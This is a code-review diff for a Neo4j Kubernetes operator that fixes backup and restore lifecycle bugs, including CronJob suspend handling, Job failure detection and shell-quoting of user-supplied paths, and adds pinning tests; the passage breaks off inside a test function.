### PR TITLE
fix(backup/restore): Wave 1 — correctness and security fixes from the audit (#217 #218 #219)

### DIFF
--- a/api/v1beta1/neo4jbackup_types.go
+++ b/api/v1beta1/neo4jbackup_types.go
@@ -137,9 +137,16 @@ type BackupOptions struct {
 	// +optional
 	Resources *corev1.ResourceRequirements `json:"resources,omitempty"`
 
-	// Compress the backup (default: true)
+	// Compress the backup (default: true).
+	// Pointer, not plain bool: `bool` + `omitempty` + a kubebuilder default
+	// silently re-applies the default when the user sets `false` (any spec
+	// round-trip through the Go client — e.g. the finalizer-add Update —
+	// drops the zero value and the API server re-defaults it), so the user
+	// could never disable compression. Same invariant as
+	// Neo4jShardedDatabase.IfNotExists (rule 66). Callers use
+	// CompressEffective(), never dereference.
 	// +kubebuilder:default=true
-	Compress bool `json:"compress,omitempty"`
+	Compress *bool `json:"compress,omitempty"`
 
 	// Verify backup integrity after creation
 	Verify bool `json:"verify,omitempty"`
@@ -212,6 +219,15 @@ type BackupOptions struct {
 
 	// KeepFailed preserves failed backup artifacts for debugging instead of deleting them.
 	KeepFailed bool `json:"keepFailed,omitempty"`
+}
+
+// CompressEffective resolves the Compress pointer: nil (unset) means the
+// documented default of true. Callers MUST use this instead of dereferencing.
+func (o *BackupOptions) CompressEffective() bool {
+	if o == nil || o.Compress == nil {
+		return true
+	}
+	return *o.Compress
 }
 
 // TempStorageSpec provisions temporary staging storage for cloud backup/restore.

--- a/api/v1beta1/zz_generated.deepcopy.go
+++ b/api/v1beta1/zz_generated.deepcopy.go
@@ -172,6 +172,11 @@ func (in *BackupOptions) DeepCopyInto(out *BackupOptions) {
 		*out = new(v1.ResourceRequirements)
 		(*in).DeepCopyInto(*out)
 	}
+	if in.Compress != nil {
+		in, out := &in.Compress, &out.Compress
+		*out = new(bool)
+		**out = **in
+	}
 	if in.RemoteAddressResolution != nil {
 		in, out := &in.RemoteAddressResolution, &out.RemoteAddressResolution
 		*out = new(bool)

--- a/bundle/manifests/neo4j.neo4j.com_neo4jbackups.yaml
+++ b/bundle/manifests/neo4j.neo4j.com_neo4jbackups.yaml
@@ -164,7 +164,15 @@ spec:
                     type: string
                   compress:
                     default: true
-                    description: 'Compress the backup (default: true)'
+                    description: |-
+                      Compress the backup (default: true).
+                      Pointer, not plain bool: `bool` + `omitempty` + a kubebuilder default
+                      silently re-applies the default when the user sets `false` (any spec
+                      round-trip through the Go client — e.g. the finalizer-add Update —
+                      drops the zero value and the API server re-defaults it), so the user
+                      could never disable compression. Same invariant as
+                      Neo4jShardedDatabase.IfNotExists (rule 66). Callers use
+                      CompressEffective(), never dereference.
                     type: boolean
                   includeMetadata:
                     description: |-

--- a/charts/neo4j-operator/crds/neo4j.neo4j.com_neo4jbackups.yaml
+++ b/charts/neo4j-operator/crds/neo4j.neo4j.com_neo4jbackups.yaml
@@ -164,7 +164,15 @@ spec:
                     type: string
                   compress:
                     default: true
-                    description: 'Compress the backup (default: true)'
+                    description: |-
+                      Compress the backup (default: true).
+                      Pointer, not plain bool: `bool` + `omitempty` + a kubebuilder default
+                      silently re-applies the default when the user sets `false` (any spec
+                      round-trip through the Go client — e.g. the finalizer-add Update —
+                      drops the zero value and the API server re-defaults it), so the user
+                      could never disable compression. Same invariant as
+                      Neo4jShardedDatabase.IfNotExists (rule 66). Callers use
+                      CompressEffective(), never dereference.
                     type: boolean
                   includeMetadata:
                     description: |-

--- a/config/crd/bases/neo4j.neo4j.com_neo4jbackups.yaml
+++ b/config/crd/bases/neo4j.neo4j.com_neo4jbackups.yaml
@@ -164,7 +164,15 @@ spec:
                     type: string
                   compress:
                     default: true
-                    description: 'Compress the backup (default: true)'
+                    description: |-
+                      Compress the backup (default: true).
+                      Pointer, not plain bool: `bool` + `omitempty` + a kubebuilder default
+                      silently re-applies the default when the user sets `false` (any spec
+                      round-trip through the Go client — e.g. the finalizer-add Update —
+                      drops the zero value and the API server re-defaults it), so the user
+                      could never disable compression. Same invariant as
+                      Neo4jShardedDatabase.IfNotExists (rule 66). Callers use
+                      CompressEffective(), never dereference.
                     type: boolean
                   includeMetadata:
                     description: |-

--- a/internal/controller/backup_api_test.go
+++ b/internal/controller/backup_api_test.go
@@ -10,6 +10,7 @@ import (
 	corev1 "k8s.io/api/core/v1"
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
 	"k8s.io/apimachinery/pkg/types"
+	"k8s.io/utils/ptr"
 
 	neo4jv1beta1 "github.com/neo4j-partners/neo4j-kubernetes-operator/api/v1beta1"
 )
@@ -35,7 +36,7 @@ var _ = Describe("Backup API Tests", func() {
 				Spec: neo4jv1beta1.Neo4jBackupSpec{
 					Target:  neo4jv1beta1.BackupTarget{Kind: "Cluster", Name: "test-cluster"},
 					Storage: neo4jv1beta1.StorageLocation{Type: "pvc", Path: "/backups/full"},
-					Options: &neo4jv1beta1.BackupOptions{BackupType: "FULL", Compress: true, PageCache: "2G"},
+					Options: &neo4jv1beta1.BackupOptions{BackupType: "FULL", Compress: ptr.To(true), PageCache: "2G"},
 				},
 			}
 			Expect(k8sClient.Create(ctx, backup)).To(Succeed())
@@ -72,7 +73,7 @@ var _ = Describe("Backup API Tests", func() {
 					Cloud:   &neo4jv1beta1.CloudBlock{Provider: "aws"},
 					Options: &neo4jv1beta1.BackupOptions{
 						BackupType: "AUTO",
-						Compress:   true,
+						Compress:   ptr.To(true),
 					},
 				},
 			}

--- a/internal/controller/backup_resolver.go
+++ b/internal/controller/backup_resolver.go
@@ -89,5 +89,15 @@ func ResolveBackupRef(ctx context.Context, c client.Reader, backupRef, namespace
 			resolved.Cloud = cb
 		}
 	}
+	// Mirror the WRITE side's path defaulting (buildToPath): an empty
+	// storage.path means the backup Job wrote to
+	// "<scheme>://<bucket>/backups/<chain>/", so the resolved location must
+	// carry "backups" too — otherwise every consumer (restore --from-path,
+	// cluster seedURI, sharded seed) reads "<scheme>://<bucket>/<chain>/"
+	// and the restore fails file-not-found (#218). PVC consumers ignore
+	// Path, so unconditional defaulting is safe.
+	if resolved.Path == "" {
+		resolved.Path = defaultBackupStoragePath
+	}
 	return resolved, succeeded.BackupsPath, nil
 }

--- a/internal/controller/neo4jbackup_controller.go
+++ b/internal/controller/neo4jbackup_controller.go
@@ -1169,7 +1169,8 @@ func (r *Neo4jBackupReconciler) buildBackupCommand(ctx context.Context, backup *
 			cmd += " --pagecache=" + backup.Spec.Options.PageCache
 		}
 		if backup.Spec.Options.TempPath != "" {
-			cmd += " --temp-path=" + backup.Spec.Options.TempPath
+			// User-controlled path into a /bin/sh -c command — quote (#219).
+			cmd += " --temp-path=" + shellQuote(backup.Spec.Options.TempPath)
 		} else if backup.Spec.Options.TempStorage != nil {
 			cmd += " --temp-path=/tmp/neo4j-staging"
 		}
@@ -1231,11 +1232,15 @@ func (r *Neo4jBackupReconciler) buildBackupCommand(ctx context.Context, backup *
 		} else {
 			validateDBArg = strings.TrimSuffix(validateDBArg, "*")
 		}
-		cmd += fmt.Sprintf(` && (neo4j-admin backup validate --from-path=%s --database="%s" || true)`, toPath, validateDBArg)
+		// toPath carries user-controlled spec fields — quote it (#219). The
+		// database arg is double-quoted by design (validated name or literal
+		// glob that neo4j-admin, not the shell, must expand).
+		cmd += fmt.Sprintf(` && (neo4j-admin backup validate --from-path=%s --database="%s" || true)`, shellQuote(toPath), validateDBArg)
 	}
 
 	if backup.Spec.Storage.Type == "pvc" {
-		cmd = fmt.Sprintf("mkdir -p %s && %s", toPath, cmd)
+		// chainFromBackup feeds the PVC path segment — quote it too (#219).
+		cmd = fmt.Sprintf("mkdir -p %s && %s", shellQuote(toPath), cmd)
 	}
 
 	return cmd, nil

--- a/internal/controller/neo4jbackup_controller.go
+++ b/internal/controller/neo4jbackup_controller.go
@@ -177,6 +177,14 @@ func (r *Neo4jBackupReconciler) Reconcile(ctx context.Context, req ctrl.Request)
 	// the check lived inside handleScheduledBackup, so suspend=true was a no-op
 	// for one-time backups (issue #116).
 	if backup.Spec.Suspend {
+		// Propagate the suspend to the CronJob itself (#217): returning early
+		// here without touching it left Kubernetes spawning scheduled Jobs
+		// while the CR reported "Suspended". Resume is handled by
+		// createBackupCronJob, which always asserts suspend=false.
+		if err := r.suspendBackupCronJob(ctx, backup); err != nil {
+			logger.Error(err, "Failed to suspend backup CronJob")
+			return ctrl.Result{RequeueAfter: r.RequeueAfter}, err
+		}
 		r.updateBackupStatus(ctx, backup, "Suspended", "Backup is suspended")
 		return ctrl.Result{RequeueAfter: r.RequeueAfter}, nil
 	}
@@ -415,8 +423,16 @@ func jobToBackupRun(job *batchv1.Job, backupsPath string) (neo4jv1beta1.BackupRu
 	}
 	run.CompletionTime = job.Status.CompletionTime
 
+	// Terminal state comes from Job CONDITIONS, not pod counters. The Job has
+	// BackoffLimit=3, so job.Status.Failed counts failed pod ATTEMPTS — it is
+	// >0 while the Job is still retrying a transient failure (node eviction,
+	// image-pull blip). Recording "Failed" at that point is permanent: the
+	// run is deduped by RunID and never corrected when a retry succeeds, so
+	// an eventually-successful run stays Failed in history and
+	// ResolveBackupRef skips it, breaking backupRef restores/seeds. Mirrors
+	// the restore controller's condition-based check.
 	switch {
-	case job.Status.Succeeded > 0:
+	case jobConditionTrue(job, batchv1.JobComplete) || job.Status.Succeeded > 0:
 		run.Status = "Succeeded"
 		if job.Status.StartTime != nil && job.Status.CompletionTime != nil {
 			run.Stats = &neo4jv1beta1.BackupStats{
@@ -424,10 +440,11 @@ func jobToBackupRun(job *batchv1.Job, backupsPath string) (neo4jv1beta1.BackupRu
 			}
 		}
 		return run, true
-	case job.Status.Failed > 0:
+	case jobConditionTrue(job, batchv1.JobFailed):
 		run.Status = "Failed"
 		return run, true
 	default:
+		// Pods may have failed attempts, but the Job is still retrying.
 		return run, false
 	}
 }
@@ -465,6 +482,16 @@ func backupRunAlreadyRecorded(history []neo4jv1beta1.BackupRun, run neo4jv1beta1
 
 func (r *Neo4jBackupReconciler) handleOneTimeBackup(ctx context.Context, backup *neo4jv1beta1.Neo4jBackup, cluster *neo4jv1beta1.Neo4jEnterpriseCluster) (ctrl.Result, error) {
 	logger := log.FromContext(ctx)
+
+	// If this CR previously had spec.schedule and the user removed it, the
+	// CronJob must go with it — otherwise it keeps firing scheduled backups
+	// while the CR claims to be a one-shot (#217). Cheap NotFound no-op in
+	// the common case. Runs before the terminal guard so a Completed CR
+	// still sheds a leftover CronJob.
+	if err := r.cleanupOrphanedCronJob(ctx, backup); err != nil {
+		logger.Error(err, "Failed to delete orphaned backup CronJob")
+		return ctrl.Result{RequeueAfter: r.RequeueAfter}, err
+	}
 
 	// One-time backups are terminal once Completed or Failed. Without this
 	// guard the controller would re-create a fresh Job every time the
@@ -524,8 +551,13 @@ func (r *Neo4jBackupReconciler) handleOneTimeBackup(ctx context.Context, backup 
 func (r *Neo4jBackupReconciler) handleExistingBackupJob(ctx context.Context, backup *neo4jv1beta1.Neo4jBackup, job *batchv1.Job) (ctrl.Result, error) {
 	backupM := metrics.NewBackupMetrics(backup.Name, backup.Namespace)
 
-	// Check job status
-	if job.Status.Succeeded > 0 {
+	// Terminal state from Job CONDITIONS, not pod counters: with
+	// BackoffLimit=3, job.Status.Failed counts failed pod attempts and is >0
+	// while the Job is still retrying a transient failure. Flipping the CR to
+	// Failed at that point is PERMANENT (the one-shot terminal guard never
+	// re-enters), so the Job's eventual success would never be recorded.
+	// Mirrors the restore controller's condition-based check.
+	if jobConditionTrue(job, batchv1.JobComplete) || job.Status.Succeeded > 0 {
 		// Backup completed successfully
 		r.updateBackupStatus(ctx, backup, "Completed", "Backup completed successfully")
 		r.Recorder.Event(backup, corev1.EventTypeNormal, EventReasonBackupCompleted, "Backup completed successfully")
@@ -537,12 +569,13 @@ func (r *Neo4jBackupReconciler) handleExistingBackupJob(ctx context.Context, bac
 		return ctrl.Result{}, nil
 	}
 
-	if job.Status.Failed > 0 {
-		// Backup failed — flip phase AND record the failed run in
-		// status.history (recheck gap 2). Before this, failed one-shot
-		// Jobs flipped phase=Failed but never appeared in history, so the
-		// only signal of past failures was the metrics counter and the
-		// transient Job object (which TTL'd out after 5 minutes).
+	if jobConditionTrue(job, batchv1.JobFailed) {
+		// Backup failed terminally (retry budget exhausted) — flip phase AND
+		// record the failed run in status.history (recheck gap 2). Before
+		// this, failed one-shot Jobs flipped phase=Failed but never appeared
+		// in history, so the only signal of past failures was the metrics
+		// counter and the transient Job object (which TTL'd out after 5
+		// minutes).
 		r.updateBackupStatus(ctx, backup, "Failed", "Backup job failed")
 		r.Recorder.Event(backup, corev1.EventTypeWarning, EventReasonBackupFailed, "Backup job failed")
 		backupM.RecordBackup(ctx, false, jobDuration(job), 0)
@@ -550,7 +583,7 @@ func (r *Neo4jBackupReconciler) handleExistingBackupJob(ctx context.Context, bac
 		return ctrl.Result{}, nil
 	}
 
-	// Job is still running
+	// Job is still running (possibly retrying a failed pod attempt).
 	r.updateBackupStatus(ctx, backup, "Running", "Backup job is running")
 	return ctrl.Result{RequeueAfter: r.RequeueAfter}, nil
 }
@@ -883,6 +916,43 @@ func (r *Neo4jBackupReconciler) createBackupJob(ctx context.Context, backup *neo
 	return job, nil
 }
 
+// suspendBackupCronJob sets spec.suspend=true on the CR's CronJob (if any) so
+// Kubernetes stops spawning scheduled Jobs while the CR is suspended (#217).
+// Missing CronJob is a no-op (one-time backups, or never scheduled).
+func (r *Neo4jBackupReconciler) suspendBackupCronJob(ctx context.Context, backup *neo4jv1beta1.Neo4jBackup) error {
+	cronJob := &batchv1.CronJob{}
+	err := r.Get(ctx, types.NamespacedName{Name: backup.Name + "-backup-cron", Namespace: backup.Namespace}, cronJob)
+	if errors.IsNotFound(err) {
+		return nil
+	}
+	if err != nil {
+		return err
+	}
+	if cronJob.Spec.Suspend != nil && *cronJob.Spec.Suspend {
+		return nil // already suspended
+	}
+	suspend := true
+	cronJob.Spec.Suspend = &suspend
+	return r.Update(ctx, cronJob)
+}
+
+// cleanupOrphanedCronJob deletes the CR's CronJob when spec.schedule has been
+// removed (scheduled → one-shot conversion). Without this the CronJob keeps
+// firing scheduled backups forever while the CR claims to be a one-shot
+// (#217). Background propagation so child Jobs/pods are GC'd too.
+func (r *Neo4jBackupReconciler) cleanupOrphanedCronJob(ctx context.Context, backup *neo4jv1beta1.Neo4jBackup) error {
+	cronJob := &batchv1.CronJob{}
+	err := r.Get(ctx, types.NamespacedName{Name: backup.Name + "-backup-cron", Namespace: backup.Namespace}, cronJob)
+	if errors.IsNotFound(err) {
+		return nil
+	}
+	if err != nil {
+		return err
+	}
+	log.FromContext(ctx).Info("Deleting orphaned backup CronJob: spec.schedule was removed", "cronJob", cronJob.Name)
+	return client.IgnoreNotFound(r.Delete(ctx, cronJob, client.PropagationPolicy(metav1.DeletePropagationBackground)))
+}
+
 func (r *Neo4jBackupReconciler) createBackupCronJob(ctx context.Context, backup *neo4jv1beta1.Neo4jBackup, cluster *neo4jv1beta1.Neo4jEnterpriseCluster) (*batchv1.CronJob, error) {
 	cronJobName := backup.Name + "-backup-cron"
 
@@ -945,6 +1015,11 @@ func (r *Neo4jBackupReconciler) createBackupCronJob(ctx context.Context, backup 
 		labels := backupLabels(backup, "backup-cron")
 		cronJob.Labels = labels
 		cronJob.Spec.Schedule = backup.Spec.Schedule
+		// This path only runs while the CR is NOT suspended (the suspend
+		// branch in Reconcile returns earlier, after suspendBackupCronJob),
+		// so asserting false here is the resume side of #217.
+		resumed := false
+		cronJob.Spec.Suspend = &resumed
 		// ConcurrencyPolicy=Forbid prevents a slow run from overlapping
 		// with the next scheduled run — two concurrent neo4j-admin backup
 		// invocations against the same cluster double the network/disk
@@ -1087,7 +1162,7 @@ func (r *Neo4jBackupReconciler) buildBackupCommand(ctx context.Context, backup *
 		if backup.Spec.Options.BackupType != "" {
 			cmd += " --type=" + backup.Spec.Options.BackupType
 		}
-		if !backup.Spec.Options.Compress {
+		if !backup.Spec.Options.CompressEffective() {
 			cmd += " --compress=false"
 		}
 		if backup.Spec.Options.PageCache != "" {

--- a/internal/controller/neo4jbackup_controller.go
+++ b/internal/controller/neo4jbackup_controller.go
@@ -1261,11 +1261,18 @@ func (r *Neo4jBackupReconciler) buildBackupCommand(ctx context.Context, backup *
 // CRs intentionally sharing one directory via the chainFromBackup link.
 // Two unrelated CRs still stay isolated because they each get their own
 // chain-root segment.
+// defaultBackupStoragePath is the bucket-relative directory used when
+// spec.storage.path is empty. The SAME default must be applied wherever a
+// backup's StorageLocation is consumed (ResolveBackupRef) — a writer/reader
+// mismatch makes every defaulted-path cloud backup unrestorable via
+// backupRef (#218).
+const defaultBackupStoragePath = "backups"
+
 func (r *Neo4jBackupReconciler) buildToPath(backup *neo4jv1beta1.Neo4jBackup) string {
 	st := backup.Spec.Storage
 	p := st.Path
 	if p == "" {
-		p = "backups"
+		p = defaultBackupStoragePath
 	}
 	crSegment := chainRoot(backup)
 	switch st.Type {

--- a/internal/controller/neo4jbackup_history_test.go
+++ b/internal/controller/neo4jbackup_history_test.go
@@ -100,9 +100,15 @@ func TestJobToBackupRun(t *testing.T) {
 	})
 
 	t.Run("failed Job → BackupRun without Duration", func(t *testing.T) {
+		// Terminal failure = JobFailed CONDITION; the Failed pod counter alone
+		// means "still retrying" since the #217 fix (BackoffLimit=3).
 		job := &batchv1.Job{
 			ObjectMeta: metav1.ObjectMeta{Name: "my-backup-backup"},
-			Status:     batchv1.JobStatus{Failed: 3, StartTime: &start},
+			Status: batchv1.JobStatus{
+				Failed:     3,
+				StartTime:  &start,
+				Conditions: []batchv1.JobCondition{{Type: batchv1.JobFailed, Status: "True"}},
+			},
 		}
 		run, ok := jobToBackupRun(job, "my-backup")
 		if !ok {
@@ -419,7 +425,12 @@ func TestRecordOneShotBackupRun_FailedJobAppendsToHistory(t *testing.T) {
 			UID:  types.UID("uid-fail"),
 			Name: "my-backup-backup",
 		},
-		Status: batchv1.JobStatus{Failed: 3, StartTime: &start},
+		// Terminal failure = JobFailed condition (#217); counter alone = retrying.
+		Status: batchv1.JobStatus{
+			Failed:     3,
+			StartTime:  &start,
+			Conditions: []batchv1.JobCondition{{Type: batchv1.JobFailed, Status: "True"}},
+		},
 	}
 	backup := &neo4jv1beta1.Neo4jBackup{
 		ObjectMeta: metav1.ObjectMeta{Name: "b", Namespace: ns},

--- a/internal/controller/neo4jbackup_lifecycle_test.go
+++ b/internal/controller/neo4jbackup_lifecycle_test.go
@@ -1,0 +1,164 @@
+/*
+Copyright 2025.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+*/
+
+package controller
+
+// Pinning tests for the #217 backup lifecycle fixes: Job-condition-based
+// terminal detection (a transient pod retry must NOT mark a backup Failed),
+// CronJob suspend propagation, orphaned-CronJob cleanup on schedule removal,
+// and the Compress *bool default semantics (rule 66).
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+	batchv1 "k8s.io/api/batch/v1"
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"k8s.io/apimachinery/pkg/runtime"
+	"k8s.io/apimachinery/pkg/types"
+	"k8s.io/client-go/tools/record"
+	"k8s.io/utils/ptr"
+	"sigs.k8s.io/controller-runtime/pkg/client/fake"
+
+	neo4jv1beta1 "github.com/neo4j-partners/neo4j-kubernetes-operator/api/v1beta1"
+)
+
+func backupLifecycleScheme(t *testing.T) *runtime.Scheme {
+	t.Helper()
+	s := runtime.NewScheme()
+	require.NoError(t, neo4jv1beta1.AddToScheme(s))
+	require.NoError(t, batchv1.AddToScheme(s))
+	return s
+}
+
+func jobWithCondition(name, ns string, condType batchv1.JobConditionType) *batchv1.Job {
+	return &batchv1.Job{
+		ObjectMeta: metav1.ObjectMeta{Name: name, Namespace: ns},
+		Status: batchv1.JobStatus{
+			Conditions: []batchv1.JobCondition{{Type: condType, Status: "True"}},
+		},
+	}
+}
+
+// TestJobToBackupRun_RetryingJobIsNotTerminal pins the core #217 fix: a Job
+// with failed pod ATTEMPTS but no JobFailed condition is still retrying
+// (BackoffLimit=3) and must not be recorded — recording Failed at that point
+// is permanent (RunID dedup never corrects it) and breaks backupRef
+// resolution for an eventually-successful run.
+func TestJobToBackupRun_RetryingJobIsNotTerminal(t *testing.T) {
+	retrying := &batchv1.Job{
+		ObjectMeta: metav1.ObjectMeta{Name: "b-backup", Namespace: "ns"},
+		Status:     batchv1.JobStatus{Failed: 1}, // one failed attempt, no terminal condition
+	}
+	_, ok := jobToBackupRun(retrying, "/backup/b")
+	assert.False(t, ok, "a retrying Job must not be recorded as a terminal run")
+
+	failed := jobWithCondition("b-backup", "ns", batchv1.JobFailed)
+	failed.Status.Failed = 4
+	run, ok := jobToBackupRun(failed, "/backup/b")
+	require.True(t, ok)
+	assert.Equal(t, "Failed", run.Status)
+
+	complete := jobWithCondition("b-backup", "ns", batchv1.JobComplete)
+	complete.Status.Succeeded = 1
+	run, ok = jobToBackupRun(complete, "/backup/b")
+	require.True(t, ok)
+	assert.Equal(t, "Succeeded", run.Status)
+}
+
+// TestHandleExistingBackupJob_RetryingJobStaysRunning pins the one-shot path:
+// the CR must report Running (not terminal Failed) while the Job retries.
+func TestHandleExistingBackupJob_RetryingJobStaysRunning(t *testing.T) {
+	scheme := backupLifecycleScheme(t)
+	backup := &neo4jv1beta1.Neo4jBackup{ObjectMeta: metav1.ObjectMeta{Name: "b", Namespace: "ns"}}
+	job := &batchv1.Job{
+		ObjectMeta: metav1.ObjectMeta{Name: "b-backup", Namespace: "ns"},
+		Status:     batchv1.JobStatus{Failed: 2}, // retrying — no JobFailed condition
+	}
+	fc := fake.NewClientBuilder().WithScheme(scheme).WithObjects(backup, job).WithStatusSubresource(backup).Build()
+	r := &Neo4jBackupReconciler{Client: fc, Recorder: record.NewFakeRecorder(10), RequeueAfter: 30 * time.Second}
+
+	res, err := r.handleExistingBackupJob(context.Background(), backup, job)
+	require.NoError(t, err)
+	assert.NotZero(t, res.RequeueAfter, "still-running Jobs requeue for re-observation")
+
+	latest := &neo4jv1beta1.Neo4jBackup{}
+	require.NoError(t, fc.Get(context.Background(), types.NamespacedName{Name: "b", Namespace: "ns"}, latest))
+	assert.Equal(t, "Running", latest.Status.Phase,
+		"failed pod attempts must not flip the CR to terminal Failed while the Job retries")
+
+	// And once the retry budget is exhausted (JobFailed condition), Failed.
+	job.Status.Conditions = []batchv1.JobCondition{{Type: batchv1.JobFailed, Status: "True"}}
+	_, err = r.handleExistingBackupJob(context.Background(), backup, job)
+	require.NoError(t, err)
+	require.NoError(t, fc.Get(context.Background(), types.NamespacedName{Name: "b", Namespace: "ns"}, latest))
+	assert.Equal(t, "Failed", latest.Status.Phase)
+}
+
+// TestSuspendBackupCronJob pins #217 suspend propagation: suspending the CR
+// must suspend the CronJob, and the scheduled-path mutate must resume it.
+func TestSuspendBackupCronJob(t *testing.T) {
+	scheme := backupLifecycleScheme(t)
+	backup := &neo4jv1beta1.Neo4jBackup{ObjectMeta: metav1.ObjectMeta{Name: "b", Namespace: "ns"}}
+	cron := &batchv1.CronJob{
+		ObjectMeta: metav1.ObjectMeta{Name: "b-backup-cron", Namespace: "ns"},
+		Spec:       batchv1.CronJobSpec{Schedule: "0 2 * * *"},
+	}
+	fc := fake.NewClientBuilder().WithScheme(scheme).WithObjects(backup, cron).Build()
+	r := &Neo4jBackupReconciler{Client: fc, Recorder: record.NewFakeRecorder(10)}
+
+	require.NoError(t, r.suspendBackupCronJob(context.Background(), backup))
+
+	latest := &batchv1.CronJob{}
+	require.NoError(t, fc.Get(context.Background(), types.NamespacedName{Name: "b-backup-cron", Namespace: "ns"}, latest))
+	require.NotNil(t, latest.Spec.Suspend)
+	assert.True(t, *latest.Spec.Suspend, "CR suspend must propagate to the CronJob")
+
+	// Idempotent on an already-suspended CronJob.
+	require.NoError(t, r.suspendBackupCronJob(context.Background(), backup))
+
+	// No CronJob (one-time backup) is a clean no-op.
+	other := &neo4jv1beta1.Neo4jBackup{ObjectMeta: metav1.ObjectMeta{Name: "no-cron", Namespace: "ns"}}
+	require.NoError(t, r.suspendBackupCronJob(context.Background(), other))
+}
+
+// TestCleanupOrphanedCronJob pins #217 schedule removal: converting a
+// scheduled CR to a one-shot must delete the CronJob, or it keeps firing
+// scheduled backups while the CR claims to be a one-shot.
+func TestCleanupOrphanedCronJob(t *testing.T) {
+	scheme := backupLifecycleScheme(t)
+	backup := &neo4jv1beta1.Neo4jBackup{ObjectMeta: metav1.ObjectMeta{Name: "b", Namespace: "ns"}}
+	cron := &batchv1.CronJob{
+		ObjectMeta: metav1.ObjectMeta{Name: "b-backup-cron", Namespace: "ns"},
+		Spec:       batchv1.CronJobSpec{Schedule: "0 2 * * *"},
+	}
+	fc := fake.NewClientBuilder().WithScheme(scheme).WithObjects(backup, cron).Build()
+	r := &Neo4jBackupReconciler{Client: fc, Recorder: record.NewFakeRecorder(10)}
+
+	require.NoError(t, r.cleanupOrphanedCronJob(context.Background(), backup))
+
+	latest := &batchv1.CronJob{}
+	err := fc.Get(context.Background(), types.NamespacedName{Name: "b-backup-cron", Namespace: "ns"}, latest)
+	assert.True(t, err != nil, "CronJob must be deleted when the schedule is removed")
+
+	// Idempotent when nothing is left.
+	require.NoError(t, r.cleanupOrphanedCronJob(context.Background(), backup))
+}
+
+// TestCompressEffective pins the rule-66 *bool semantics: nil means the
+// documented default (true); an explicit false survives.
+func TestCompressEffective(t *testing.T) {
+	var nilOpts *neo4jv1beta1.BackupOptions
+	assert.True(t, nilOpts.CompressEffective())
+	assert.True(t, (&neo4jv1beta1.BackupOptions{}).CompressEffective())
+	assert.True(t, (&neo4jv1beta1.BackupOptions{Compress: ptr.To(true)}).CompressEffective())
+	assert.False(t, (&neo4jv1beta1.BackupOptions{Compress: ptr.To(false)}).CompressEffective(),
+		"explicit false must survive — bool+omitempty+default silently re-applied true (rule 66)")
+}

--- a/internal/controller/neo4jrestore_cloud_test.go
+++ b/internal/controller/neo4jrestore_cloud_test.go
@@ -7,8 +7,11 @@ import (
 
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
+	appsv1 "k8s.io/api/apps/v1"
 	corev1 "k8s.io/api/core/v1"
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"k8s.io/apimachinery/pkg/types"
+	"k8s.io/utils/ptr"
 	"sigs.k8s.io/controller-runtime/pkg/client/fake"
 
 	neo4jv1beta1 "github.com/neo4j-partners/neo4j-kubernetes-operator/api/v1beta1"
@@ -865,4 +868,55 @@ func TestResolveRestoreSource_BackupRefEmptyStoragePathDefaulted(t *testing.T) {
 		"s3://prod-bucket/backups/defaulted",
 		r.buildRestoreFromPath(tmp),
 		"restore must read from the SAME location the backup Job wrote to")
+}
+
+// TestStopCluster_PreservesOriginalReplicasOnReEntry pins #218: startRestore
+// can re-enter after a successful stop (Pending route while the referenced
+// backup finishes). stopCluster must NOT overwrite the recorded original
+// replica count with the now-current 0 — startCluster would "restore" zero
+// replicas and the instance would never come back.
+func TestStopCluster_PreservesOriginalReplicasOnReEntry(t *testing.T) {
+	sts := &appsv1.StatefulSet{
+		ObjectMeta: metav1.ObjectMeta{
+			Name:      "sa",
+			Namespace: "ns",
+			Annotations: map[string]string{
+				// First pass already recorded the true original count.
+				"neo4j.neo4j.com/original-replicas": "3",
+			},
+		},
+		Spec: appsv1.StatefulSetSpec{Replicas: ptr.To(int32(0))}, // already stopped
+	}
+	standalone := &neo4jv1beta1.Neo4jEnterpriseStandalone{ObjectMeta: metav1.ObjectMeta{Name: "sa", Namespace: "ns"}}
+	fc := fake.NewClientBuilder().WithScheme(newTestScheme()).WithObjects(sts, standalone).Build()
+	r := &Neo4jRestoreReconciler{Client: fc}
+
+	// stopCluster's pod-wait loop returns immediately: no pods exist.
+	cluster := standaloneAsCluster(standalone)
+	require.NoError(t, r.stopCluster(context.Background(), cluster))
+
+	latest := &appsv1.StatefulSet{}
+	require.NoError(t, fc.Get(context.Background(), types.NamespacedName{Name: "sa", Namespace: "ns"}, latest))
+	assert.Equal(t, "3", latest.Annotations["neo4j.neo4j.com/original-replicas"],
+		"re-entry must not overwrite the original replica count with the current (0) value")
+}
+
+// TestRestoreAlreadyStoppedInstance pins the #218 re-entry guard for
+// checkDatabaseExists: only the restore that holds the in-progress marker
+// skips the Bolt preflight.
+func TestRestoreAlreadyStoppedInstance(t *testing.T) {
+	standalone := &neo4jv1beta1.Neo4jEnterpriseStandalone{
+		ObjectMeta: metav1.ObjectMeta{
+			Name: "sa", Namespace: "ns",
+			Annotations: map[string]string{RestoreInProgressAnnotation: "my-restore"},
+		},
+	}
+	fc := fake.NewClientBuilder().WithScheme(newTestScheme()).WithObjects(standalone).Build()
+	r := &Neo4jRestoreReconciler{Client: fc}
+	cluster := standaloneAsCluster(standalone)
+
+	mine := &neo4jv1beta1.Neo4jRestore{ObjectMeta: metav1.ObjectMeta{Name: "my-restore", Namespace: "ns"}}
+	other := &neo4jv1beta1.Neo4jRestore{ObjectMeta: metav1.ObjectMeta{Name: "other-restore", Namespace: "ns"}}
+	assert.True(t, r.restoreAlreadyStoppedInstance(context.Background(), mine, cluster))
+	assert.False(t, r.restoreAlreadyStoppedInstance(context.Background(), other, cluster))
 }

--- a/internal/controller/neo4jrestore_cloud_test.go
+++ b/internal/controller/neo4jrestore_cloud_test.go
@@ -920,3 +920,19 @@ func TestRestoreAlreadyStoppedInstance(t *testing.T) {
 	assert.True(t, r.restoreAlreadyStoppedInstance(context.Background(), mine, cluster))
 	assert.False(t, r.restoreAlreadyStoppedInstance(context.Background(), other, cluster))
 }
+
+// TestRestoreAdminSecretName pins the #218 nil-Auth fix: a standalone target
+// without spec.auth must resolve the default secret name, not panic.
+func TestRestoreAdminSecretName(t *testing.T) {
